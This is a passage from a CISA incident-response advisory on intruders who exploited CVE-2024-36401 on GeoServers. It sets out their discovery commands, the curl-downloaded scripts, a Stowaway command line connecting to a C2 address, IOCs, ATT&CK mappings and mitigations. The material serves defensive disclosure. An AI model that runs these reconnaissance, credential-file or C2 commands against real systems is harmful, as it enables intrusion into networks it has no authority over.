<p>Once inside the organization’s network, the cyber threat actors primarily relied on brute force techniques [<a href="https://attack.mitre.org/versions/v17/techniques/T1110/" target="_blank" title="T1110">T1110</a>] to obtain passwords for lateral movement and privilege escalation. They also accessed service accounts by exploiting their associated services.</p>
<h3>Discovery</h3>
<p>After gaining initial access, the cyber threat actors conducted discovery to facilitate lateral movement. They performed ping sweeps of hosts within specific subnets [<a href="https://attack.mitre.org/versions/v17/techniques/T1018/" target="_blank" title="T1018">T1018</a>] and downloaded the <code>fscan</code> tool <a href="#fscan" title="Footnote Reference 4"><sup>[4]</sup></a> to scan the organization’s network. CISA identified the use of the <code>fscan</code> tool by analyzing evidence of its output found on disk. (<strong>Note:&nbsp;</strong><code>fscan</code> is publicly available on GitHub and is capable of port scanning, fingerprinting, and web vulnerability detection—among other functions.) Between July 15 and 31, 2024, the cyber threat actors conducted extensive network and vulnerability scanning using <code>fscan</code> and <code>linux-exploit-suggester2.pl.</code> CISA’s host forensics analysts uncovered this activity by reviewing remnants the cyber threat actors left on disk.</p>
<h4><strong>GeoServer 1</strong></h4>
<p>The cyber threat actors leveraged <a href="https://www.cve.org/CVERecord?id=CVE-2024-36401" target="_blank" title="CVE-2024-36401">CVE-2024-36401</a> to execute the following host discovery commands on GeoServer 1:</p>
<ul>
<li>uname-a</li>
<li>df-h</li>
<li>env</li>
<li>ps -aux</li>
<li>ipconfig [<a href="https://attack.mitre.org/versions/v17/techniques/T1016/" target="_blank" title="T1016">T1016</a>]</li>
<li>date</li>
<li>who -b</li>
<li>rpm -qa polkit</li>
<li>netstat -ano [<a href="https://attack.mitre.org/versions/v17/techniques/T1049/" target="_blank" title="T1049">T1049</a>]</li>
</ul>
<p>Additionally, they employed LOTL techniques for user, service, filesystem, and network discovery on GeoServer 1:</p>
<ul>
<li>cat /etc/passwd [<a href="https://attack.mitre.org/versions/v17/techniques/T1087/001/" target="_blank" title="T1087.001">T1087.001</a>]</li>
<li>cat /etc/resolv.conf</li>
<li>cat /usr/local/apache-tomcat-9.0.89/webapps/geoserver/WEB-INF/web.xml</li>
<li>cat /etc/redhat-release [<a href="https://attack.mitre.org/versions/v17/techniques/T1082/" target="_blank" title="T1082">T1082</a>]</li>
<li>cat /etc/os-release&nbsp;</li>
</ul>
<p>The cyber threat actors then used <code>curl</code> commands to download a shell script named <code>mm.sh</code> (which they renamed to <code>aa.sh</code>) and a zip file named <code>aaa.zip</code> to the <code>/tmp/</code> directory.</p>
<p>Subsequently, they enumerated the internal network from GeoServer 1, identifying Secure Shell (SSH) listeners, File Transfer Protocol (FTP) servers, file servers, and web servers [<a href="https://attack.mitre.org/versions/v17/techniques/T1046/" target="_blank" title="T1046">T1046</a>] by using the <code>fscan</code> tool. (<strong>Note:</strong> CISA observed endpoint logs that showed the cyber threat actors uploaded <code>fscan</code> to the compromised host and ran it against internal systems.) The actors then attempted to brute force login credentials for the exploited web services to gain remote access, achieve RCE, or move laterally.</p>
<p>The cyber threat actors also conducted ping sweeps of several hosts within the organization’s internal subnets using <code>fscan</code>. Their use of the <code>-nobr</code> and <code>-nopoc</code> flags for <code>fscan</code> indicated that this scan excluded brute forcing or vulnerability scanning, respectively.</p>
<h4><strong>SQL Server</strong></h4>
<p>CISA observed the following discovery commands on the organization’s SQL server:</p>
<ul>
<li>whoami [<a href="https://attack.mitre.org/versions/v17/techniques/T1033/" target="_blank" title="T1033">T1033</a>]</li>
<li>ipconfig /all</li>
<li>ping -n 1 8.8.8.8</li>
<li>systeminfo</li>
<li>tasklist [<a href="https://attack.mitre.org/versions/v17/techniques/T1057/" target="_blank" title="T1057">T1057</a>]</li>
<li>dir c: [<a href="https://attack.mitre.org/versions/v17/techniques/T1083/" target="_blank" title="T1083">T1083</a>]</li>
<li>dir c:Users</li>
<li>type c:Last.txt</li>
<li>type c:inetpubwwwroot</li>
<li>type c:inetpub</li>
<li>dir c:inetpubwwwroot</li>
<li>dir c:</li>
<li>dir c:ifwapps</li>
<li>dir d:</li>
<li>dir e:</li>
<li>net group &#8220;domain admins&#8221; /domain</li>
<li>type C:WindowsSystem32inetsrvconfigapplicationHost.config</li>
<li>dir c:ifwappsTier1Utilities</li>
<li>netstat -ano</li>
<li>curl</li>
<li>net user</li>
<li>tasklist</li>
</ul>
<h4><strong>GeoServer 2</strong></h4>
<p>Based on images CISA received of GeoServer 2, CISA observed the bash history of a user that showed the use of Burp Collaborator to execute encoded host and network discovery commands.</p>
<h3>Lateral Movement</h3>
<p>In one instance, the cyber threat actors moved laterally from the Web Server to the SQL Server by enabling <code>xp_cmdshell</code> for RCE on GeoServer 1.</p>
<h3>Command and Control</h3>
<p>The cyber threat actors used PowerShell [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/001/" target="_blank" title="T1059.001">T1059.001</a>] and <code>bitsadmin getfile</code> to download payloads [<a href="https://attack.mitre.org/versions/v17/techniques/T1105/" target="_blank" title="T1105">T1105</a>].&nbsp;</p>
<p>They used Stowaway <a href="#Stowaway" title="Footnote Reference 5">[5]</a>, a publicly available multi-level proxy tool, to establish C2 [<a href="https://attack.mitre.org/versions/v17/techniques/T1090/" target="_blank" title="T1090">T1090</a>]. Stowaway enabled the cyber threat actors to bypass the organization’s intranet restrictions and access internal network resources by forwarding traffic from their C2 server through the Web Server. They wrote Stowaway to disk using a <code>tomcat</code> service account.</p>
<p>The actors then executed Stowaway via <code>/var/tmp/agent -c 45.32.22[.]62:4441 -s f86bc7ff68aff3ad –up http –reconnect 10</code>.</p>
<p>To test their level of access, the cyber threat actors performed a ping sweep of multiple hosts in a particular subnet of the organization’s network. Next, the cyber threat actors downloaded a modified version of Stowaway using a <code>curl</code> command, successfully establishing an outbound connection with their C2 server using <code>HTTP</code> over <code>TCP/4441</code>.</p>
<p>On July 14, 2024, the cyber threat actors executed <code>/tmp/mm.sh</code> on the Web Server followed by an encoded command to execute Stowaway. The contents of this file could not be recovered. Additionally, they used Stowaway to establish a second C2 connection over <code>TCP/50012</code>, likely serving as a backup C2 channel.</p>
<p>CISA discovered evidence of various files hosted on the C2 server, including numerous publicly available tools and scripts:</p>
<ul>
<li>RingQ antivirus defense evasion tool (<code>RingQ.exe</code>, <code>RingQ.rar</code>)</li>
<li>IOX proxy tool (<code>iox.rar</code>)</li>
<li>BusyBox trojan multi-tool (<code>busybox</code>)</li>
<li>WinRAR archive tool (<code>Rar.exe</code>)</li>
<li>Stowaway proxy tool (<code>agent</code>, <code>agent.tar</code>, <code>agent.zip</code>, <code>agentu.exe</code>)</li>
<li>Web shells (<code>Handx.ashx</code>, <code>start_tomcat.jsp</code>)</li>
<li>Various shell scripts (<code>mm.sh</code>, <code>t.py</code>, <code>t1.sh</code>, <code>c.bat</code>)</li>
</ul>
<h3>Detection</h3>
<p>The cyber threat actors remained undetected in the organization’s environment for three weeks before the organization’s SOC identified the compromise using their EDR tool. On July 31, 2024, their EDR tool identified a&nbsp;<code>1.txt</code> file uploaded as suspected malware on the SQL Server. The SOC responded to additional alerts when the cyber threat actors transferred&nbsp;<code>1.txt</code> to the SQL Server through&nbsp;<code>bitsadmin</code> after attempting other LOTL techniques, such as leveraging PowerShell and&nbsp;<code>certutil</code>. The alerts&nbsp;generated by this activity on the SQL server prompted the SOC to contain the server, initiate an investigation, request assistance from CISA, and uncover malicious activity on GeoServer 1.</p>
<h2><a class="ck-anchor" id="Lessons Learned"><strong>Lessons Learned</strong></a></h2>
<p>CISA is sharing the following lessons learned based on what CISA learned about the organization’s security posture through incident detection and response activities.</p>
<ol>
<li><strong>Vulnerabilities were not promptly remediated</strong>.
<ol>
<li>The cyber threat actors exploited <a href="https://www.cve.org/CVERecord?id=CVE-2024-36401" target="_blank" title="CVE-2024-36401">CVE-2024-36401</a> for initial access on two GeoServers.</li>
<li>The vulnerability was disclosed June 30, 2024, and the cyber threat actors exploited it for initial access to GeoServer 1 on July 11, 2024.</li>
<li>The vulnerability was added to CISA’s KEV Catalog on July 15, 2024, and by July 24, 2024, the vulnerability was not patched when the cyber threat actors exploited it for access to GeoServer 2.
<ol>
<li><strong>Note:</strong> FCEB agencies are required to remediate vulnerabilities in CISA’s KEV Catalog within prescribed timeframes under <a href="https://www.cisa.gov/news-events/directives/binding-operational-directive-22-01" title="Binding Operational Directive (BOD) 22-01">Binding Operational Directive (BOD) 22-01</a>. July 24, 2024, was within the KEV-required patching window for this CVE. However, CISA encourages FCEB agencies and critical infrastructure organizations to address KEV catalog vulnerabilities immediately as part of their vulnerability management plan.</li>
</ol>
</li>
</ol>
</li>
<li><strong>The agency did not test or exercise their IRP, nor did their IRP enable them to promptly engage third parties and grant third parties’ access to necessary resources</strong>.
<ol>
<li>On Aug. 1, 2024, upon discovering the endpoint alerts, the agency conducted remote triage of affected systems and used their EDR tool to contain the intrusion.
<ol>
<li>After containment, the agency engaged CISA to investigate potential threat actor persistence in their environment.</li>
<li>Their IRP did not have procedures for bringing in third parties for assistance, which hampered CISA’s efforts to respond to the incident quickly and efficiently.
<ol>
<li>The agency could not provide CISA remote access to their security information and event management (SIEM) tool, which initially kept CISA from reviewing all available logs, hindering CISA’s analysis.</li>
<li>The agency had to go through their change control board process before CISA could deploy their EDR agents.</li>
<li>The agency could have proactively identified these roadblocks by testing their IRP, such as via a tabletop exercise, but had not tested their plan for a long period.</li>
</ol>
</li>
</ol>
</li>
</ol>
</li>
<li><strong>EDR alerts were not continuously reviewed, and some public-facing systems lacked endpoint protection</strong>.
<ol>
<li>The activity remained undetected for three weeks; the agency missed an opportunity to detect this activity on July 15, 2024, as they did not observe an alert from GeoServer 1 where the EDR detected the Stowaway tool.</li>
<li>The Web Server lacked endpoint protection.</li>
</ol>
</li>
</ol>
<h2><strong>Indicators of Compromise</strong></h2>
<p>See <a href="#Table%C2%A01.%20IOCs" title="Table&nbsp;1. IOCs"><strong>Table 1</strong></a> for IOCs associated with this activity.</p>
<p><strong>Disclaimer:</strong> The IP addresses in this advisory were observed in August 2024, and some may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.</p>
<p><a class="ck-anchor" id="Table&nbsp;1. IOCs">Table&nbsp;1. IOCs</a></p>
<div>
<table class="tablesaw tablesaw-stack">
<thead>
<tr>
<th role="columnheader">IOC</th>
<th role="columnheader">Type</th>
<th role="columnheader">Date</th>
<th role="columnheader">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>45.32.22[.]62</td>
<td>IPv4</td>
<td>Mid-July to early August 2024</td>
<td>C2 Server IP Address</td>
</tr>
<tr>
<td>45.17.43[.]250</td>
<td>IPv4</td>
<td>Mid-July to early August 2024</td>
<td>C2 Server IP Address</td>
</tr>
<tr>
<td>0777EA1D01DAD6DC261A6B602205E2C8</td>
<td>MD5</td>
<td>Mid-July to early August 2024</td>
<td>China Chopper Web Shell</td>
</tr>
<tr>
<td>feda15d3509b210cb05eacc22485a78c</td>
<td>MD5</td>
<td>Mid-July to early August 2024</td>
<td>Generic PHP Web Shell</td>
</tr>
<tr>
<td>C9F4C41C195B25675BFA860EB9B45945</td>
<td>MD5</td>
<td>Mid-July to early August 2024</td>
<td>Linux Exploit CVE-2016-5195</td>
</tr>
<tr>
<td>B7B3647E06F23B9E83D0B1CCE3E71642</td>
<td>MD5</td>
<td>Mid-July to early August 2024</td>
<td>Dirtycow</td>
</tr>
<tr>
<td>64e3a3458b3286caaac821c343d4b208</td>
<td>MD5</td>
<td>Mid-July to early August 2024</td>
<td>Stowaway Proxy Tool</td>
</tr>
<tr>
<td>20b70dac937377b6d0699a44721acd80</td>
<td>MD5</td>
<td>Mid-July to early August 2024</td>
<td>Unknown Downloaded Executable</td>
</tr>
<tr>
<td>de778443619f37e2224898a9a800fa78</td>
<td>MD5</td>
<td>Mid-July to early August 2024</td>
<td>Unknown Downloaded Executable</td>
</tr>
</tbody>
</table>
<h2><a class="ck-anchor" id="MITRE ATT&amp;CK Tactics and Techniques"><strong>MITRE ATT&amp;CK Tactics and Techniques</strong></a></h2>
<p>See <a href="#Table%C2%A02.%20Reconnaissance" title="Table&nbsp;2. Reconnaissance"><strong>Table 2</strong></a> through <a href="#Table%C2%A011.%20Command%20and%20Control" title="Table&nbsp;11. Command and Control"><strong>Table 11</strong></a> for all referenced threat actor tactics and techniques.</p>
<p><a class="ck-anchor" id="Table&nbsp;2. Reconnaissance">Table&nbsp;2. Reconnaissance</a></p>
<div>
<table class="tablesaw tablesaw-stack">
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Active Scanning: Vulnerability Scanning</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1595/002/" target="_blank" title="T1595.002">T1595.002</a></td>
<td>The cyber threat actors performed active scanning to identify vulnerabilities they could use for initial access.</td>
</tr>
</tbody>
</table>
</div>
<p><a class="ck-anchor" id="Table&nbsp;3. Resource Development">Table&nbsp;3. Resource Development</a></p>
<div>
<table class="tablesaw tablesaw-stack">
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Acquire Infrastructure: Virtual Private Server</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1583/003/" target="_blank" title="T1583.003">T1583.003</a></td>
<td>The cyber threat actors gained remote access to the victim’s network using a desktop behind a virtual private server (VPS).</td>
</tr>
</tbody>
</table>
</div>
<p>Table 4. Initial Access</p>
<div>
<table class="tablesaw tablesaw-stack">
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Exploit Public-Facing Application</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1190/" target="_blank" title="T1190">T1190</a></td>
<td>The cyber threat actors exploited CVE 2024-36401 on two of the organization’s public-facing GeoServers.</td>
</tr>
</tbody>
</table>
</div>
<p>Table 5. Execution</p>
<div>
<table class="tablesaw tablesaw-stack">
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Command and Scripting Interpreter: PowerShell</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1059/001/" target="_blank" title="T1059.001">T1059.001</a></td>
<td>The cyber threat actors used PowerShell to download a payload.</td>
</tr>
</tbody>
</table>
</div>
<p>Table 6. Defense Evasion</p>
<div>
<table class="tablesaw tablesaw-stack">
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Indirect Command Execution</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1202/" target="_blank" title="T1202">T1202</a></td>
<td>The cyber threat actors employed indirect command execution via web shells.</td>
</tr>
</tbody>
</table>
</div>
<p>Table 7. Persistence</p>
<div>
<table class="tablesaw tablesaw-stack">
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>BITS Jobs</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1197/" target="_blank" title="T1197">T1197</a></td>
<td>The cyber threat actors abused BITS jobs.</td>
</tr>
<tr>
<td>Scheduled Task/Job: Cron</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1053/003/" target="_blank" title="T1053.003">T1053.003</a></td>
<td>The cyber threat actors established persistence through <code>cron</code> jobs.</td>
</tr>
<tr>
<td>Server Software Component: Web Shell</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1505/003/" target="_blank" title="T1505.003">T1505.003</a></td>
<td>The cyber threat actors uploaded web shells for persistence.</td>
</tr>
<tr>
<td>Valid Accounts</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1078/" target="_blank" title="T1078">T1078</a></td>
<td>The cyber threat actors used valid accounts for persistence.</td>
</tr>
</tbody>
</table>
</div>
<p>Table 8. Privilege Escalation</p>
<div>
<table class="tablesaw tablesaw-stack">
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Exploitation for Privilege Escalation</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1068/" target="_blank" title="T1068">T1068</a></td>
<td>The cyber threat actors attempted to exploit CVE-2016-5195 to escalate privileges.</td>
</tr>
</tbody>
</table>
</div>
<p>Table 9. Credential Access&nbsp;</p>
<div>
<table class="tablesaw tablesaw-stack">
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Brute Force</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1110/" target="_blank" title="T1110">T1110</a></td>
<td>The cyber threat actors used brute force techniques to obtain login credentials for web services.</td>
</tr>
</tbody>
</table>
</div>
<p>Table 10. Discovery</p>
<div>
<table class="tablesaw tablesaw-stack">
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Account Discovery: Local Account</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1087/001/" target="_blank" title="T1087.001">T1087.001</a></td>
<td>The cyber threat actors used <code>cat /etc/passwd</code> to discover local users.</td>
</tr>
<tr>
<td>File and Directory Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1083/" target="_blank" title="T1083">T1083</a></td>
<td>The cyber threat actors used <code>dir c:</code>, <code>dir d:</code>, <code>dir e:</code>, and <code>type c:</code> commands to identify files and directories on the SQL server.&nbsp;</td>
</tr>
<tr>
<td>Network Service Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1046/" target="_blank" title="T1046">T1046</a></td>
<td>The cyber threat actors used <code>fscan</code> to identify SSH listeners and FTP servers.</td>
</tr>
<tr>
<td>Process Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1057/" target="_blank" title="T1057">T1057</a></td>
<td>The cyber threat actors used <code>tasklist</code> on the SQL server.</td>
</tr>
<tr>
<td>Remote System Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1018/" target="_blank" title="T1018">T1018</a></td>
<td>The cyber threat actors performed ping sweeps of hosts within specific subnets.</td>
</tr>
<tr>
<td>System Information Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1082/" target="_blank" title="T1082">T1082</a></td>
<td>The cyber threat actors used cat <code>/etc/redhat-release</code> and <code>cat /etc/os-release</code> commands to get Red Hat Enterprise Linux (RHEL) and Linux operating system information.</td>
</tr>
<tr>
<td>System Network Configuration Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1016/" target="_blank" title="T1016">T1016</a></td>
<td>The cyber threat actors used <code>ipconfig</code> to check GeoServer 1’s and the SQL server’s network configurations.</td>
</tr>
<tr>
<td>System Network Connections Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1049/" target="_blank" title="T1049">T1049</a></td>
<td>The cyber threat actors executed commands such as <code>netstat</code> to obtain a listing of network connections to or from the systems they compromised.</td>
</tr>
<tr>
<td>System Owner/User Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1033/" target="_blank" title="T1033">T1033</a></td>
<td>The cyber threat actors used <code>whoami</code> on the SQL server.</td>
</tr>
</tbody>
</table>
</div>
<p><a class="ck-anchor" id="Table&nbsp;11. Command and Control">Table&nbsp;11. Command and Control</a></p>
<div>
<table class="tablesaw tablesaw-stack">
<thead>
<tr>
<th role="columnheader">Technique Title&nbsp;</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ingress Tool Transfer</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1105/" target="_blank" title="T1105">T1105</a></td>
<td>The cyber threat actors used PowerShell and <code>bitsadmin getfile</code> to download payloads.</td>
</tr>
<tr>
<td>Proxy</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1090/" target="_blank" title="T1090">T1090</a></td>
<td>The cyber threat actors used a connection proxy to direct traffic from their C2 server.</td>
</tr>
</tbody>
</table>
<h2><a class="ck-anchor" id="Mitigations"><strong>Mitigations</strong></a></h2>
<p>CISA recommends organizations implement the mitigations below to improve cybersecurity posture based on lessons learned from the engagement. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">Cross-Sector Cybersecurity Performance Goals</a> for more information on the CPGs, including additional recommended baseline protections.</p>
<ul>
<li><strong>Establish a vulnerability management plan that includes procedures for prioritization and emergency patching.</strong>
<ul>
<li>Prioritize patching of known exploited vulnerabilities listed in the KEV catalog.
<ul>
<li>CISA urges organizations to address KEV catalog vulnerabilities <em>immediately</em>.</li>
</ul>
</li>
<li>Prioritize patching vulnerabilities in high-risk systems, including public facing systems as they are attractive targets for threat actors.</li>
<li>Ensure high-risk systems are identified and prioritized for rapid patching by implementing asset management practices and conducting an asset inventory.
<ul>
<li>Continuously discover and validate internet-facing assets through automated asset management and scanning (e.g., attack surface management tools, vulnerability scanners).</li>
<li>Consider using a configuration management database (CMDB) with discovery and vulnerability tools to enrich asset context and support automated prioritization.</li>
</ul>
</li>
<li>Form a dedicated team responsible for assessing and implementing emergency patches, this team should include representatives from IT, security, and relevant business units.</li>
</ul>
</li>
<li><strong>Maintain, practice, and update cybersecurity IRPs&nbsp;</strong>[<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#IncidentResponseIRPlans2S" title="CPG 2.S">CPG 2.S</a>, <a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#IncidentPlanningandPreparedness5A" title="5.A">5.A</a>].
<ul>
<li>Prepare a written IRP policy and IRP with senior leadership support.
<ul>
<li>The policy should identify purpose and objectives, what constitutes an incident, prioritization or severity ratings of incidents, clear escalation procedures, IR personnel, and plans for notification, interaction and information sharing with media, law enforcement, and partners.</li>
<li>The IRP should identify:
<ul>
<li>Key personnel with knowledge of the network</li>
<li>Key resources and courses of action (COAs) for containment and eradication in the event of compromise.</li>
<li>Procedures for granting third parties prompt access to networks and security tools.
<ul>
<li>This should include processes for expediating deployment of EDR and other security tools through change control boards (CCBs).</li>
</ul>
</li>
</ul>
</li>
<li>The IRP should include procedures for establishing out-of-band communications systems and accounts in case primary systems are compromised or not available (such as with ransomware incidents).</li>
<li>Periodically test the IRP under real-world conditions, such as via purple team engagements and tabletop exercises.
<ul>
<li>During the test, include engagement with third party incident responders and external EDR agents and other tools.</li>
<li>Following the test, update the IRP as necessary.</li>
<li>See CISA’s <a href="https://www.cisa.gov/resources-tools/services/cisa-tabletop-exercise-packages" title="Tabletop Exercise Packages">Tabletop Exercise Packages</a> for resources designed to assist organizations with conducting their own exercises.</li>
</ul>
</li>
<li>For more information on IRPs, see the National Institute of Science and Technology’s (NIST’s) <a href="https://csrc.nist.gov/pubs/sp/800/61/r3/final" target="_blank" title="SP 800-61 Rev. 3, Incident Response Recommendations and Considerations for Cybersecurity Risk Management: A CSF 2.0 Community Profile">SP 800-61 Rev. 3, Incident Response Recommendations and Considerations for Cybersecurity Risk Management: A CSF 2.0 Community Profile</a>.</li>
</ul>
</li>
</ul>
</li>
<li><strong>Implement comprehensive (i.e., large coverage) and verbose (i.e., detailed) logging and aggregate logs</strong> in an out-of-band, centralized location.
<ul>
<li>Prepare SOCs with sufficient resources to monitor collected logs and responses to malicious cyber threat activity.</li>
<li>Consider using a SIEM solution for log aggregation and management.</li>
<li>Identify, alert on, and investigate abnormal network activity (as threat actor activity generates unusual network traffic across all phases of the attack chain).
<ul>
<li>Abnormal activity to look for includes:
<ul>
<li>Running scans to discover other network connected devices.</li>
<li>Running commands to list, add, or alter administrator accounts.</li>
<li>Using PowerShell to download and execute remote programs.</li>
<li>Running scripts not usually seen on a network.</li>
</ul>
</li>
<li>For additional information, see joint guide <a href="https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques" title="Identifying and Mitigating Living off the Land Techniques">Identifying and Mitigating Living off the Land Techniques</a>, which provides prioritized detection recommendations that enable behavior analytics, anomaly detection, and proactive hunting.</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>In addition to the above, CISA recommends organizations implement the following mitigations based on threat actor activity:</p>
<ul>
<li><strong>Require </strong><a href="https://www.cisa.gov/sites/default/files/2023-01/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf" title="Implementing Phishing-Resistant MFA"><strong>phishing-resistant MFA</strong></a><strong>&nbsp;</strong>for access to all privileged accounts and email services accounts [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#PhishingResistantMultifactorAuthenticationMFA2H" title="CPG 2.H">CPG 2.H</a>].</li>
<li><strong>Implement allowlisting </strong>for applications, scripts, and network traffic to prevent unauthorized execution and access.</li>
</ul>
<h2><strong>Validate Security Controls</strong></h2>
<p>In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&amp;CK Matrix for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.</p>
<p>To get started:</p>
<ol>
<li>Select an ATT&amp;CK technique described in this advisory (see <a href="#Table%C2%A03.%20Resource%20Development" title="Table&nbsp;3. Resource Development"><strong>Table 3</strong></a> through <a href="#Table%C2%A011.%20Command%20and%20Control" title="Table&nbsp;11. Command and Control"><strong>Table 11</strong></a>).</li>
<li>Align your security technologies against the technique.</li>
<li>Test your technologies against the technique.</li>
<li>Analyze your detection and prevention technologies’ performance.</li>
<li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
<li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
</ol>
<p>CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory.</p>
<h2>Resources</h2>
<ul>
<li><a href="https://www.cisa.gov/resources-tools/resources/incident-response-plan-irp-basics" title="Incident Response Plan (IRP) Basics">Incident Response Plan (IRP) Basics</a></li>
<li><a href="https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques" title="Identifying and Mitigating Living Off the Land Techniques">Identifying and Mitigating Living Off the Land Techniques</a></li>
<li><a href="https://www.cisa.gov/resources-tools/resources/phishing-resistant-multi-factor-authentication-mfa-success-story-usdas-fast-identity-online-fido" title="Phishing-Resistant Multi-Factor Authentication (MFA) Success Story: USDA’s Fast IDentity Online (FIDO) Implementation">Phishing-Resistant Multi-Factor Authentication (MFA) Success Story: USDA’s Fast IDentity Online (FIDO) Implementation</a></li>
</ul>
<h2>Disclaimer</h2>
<p>The information in this report is being provided “as is” for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA.</p>
<h2>Version History</h2>
<p><strong>September 23, 2025:</strong> Initial version.</p>
<h2>Apendix: Key Events Timeline</h2>
<div>
<table class="tablesaw tablesaw-stack">
<thead>
<tr>
<th role="columnheader">Date/Time</th>
<th role="columnheader">Relevant Host</th>
<th role="columnheader">Event</th>
</tr>
</thead>
<tbody>
<tr>
<td>July 1, 2024</td>
<td>n/a</td>
<td>CVE-2024-36401 published.</td>
</tr>
<tr>
<td>July 11, 2024</td>
<td>GeoServer 1</td>
<td>Initial Access to GeoServer 1.</td>
</tr>
<tr>
<td>July 15, 2024</td>
<td>n/a</td>
<td>CVE-2024-36401 added to CISA’s Known Exploited Vulnerabilities Catalog.</td>
</tr>
<tr>
<td>July 15, 2024</td>
<td>GeoServer 1</td>
<td>EDR detects Stowaway tool on GeoServer 1.</td>
</tr>
<tr>
<td>July 24, 2024</td>
<td>GeoServer 2</td>
<td>Initial Access to GeoServer 2.</td>
</tr>
<tr>
<td>July 31, 2024</td>
<td>Web Server</td>
<td>Initial Access to Web Server.</td>
</tr>
<tr>
<td>July 31, 2024</td>
<td>SQL Server</td>
<td>Initial Access to SQL Server.</td>
</tr>
<tr>
<td>Aug. 1, 2024</td>
<td>SQL Server, GeoServer 1</td>
<td>Organization observes SQL Alert and contains SQL Server and GeoServer 1.</td>
</tr>
<tr>
<td>Aug. 1, 2024</td>
<td>n/a</td>
<td>Impacted organization requested CISA’s threat hunting assistance.</td>
</tr>
<tr>
<td>Aug. 5, 2024</td>
<td>n/a</td>
<td>The impacted organization requested assistance from CISA; CISA began forensic artifact analysis.</td>
</tr>
<tr>
<td>Aug. 6, 2024</td>
<td>GeoServer 2</td>
<td>Last observed threat actors’ activity—discovery commands on GeoServer 2.</td>
</tr>
<tr>
<td>Aug. 8 – Sept. 3, 2024</td>
<td>n/a</td>
<td>CISA conducted their full incident response.</td>
</tr>
</tbody>
</table>
</div>
<h2>Notes</h2>
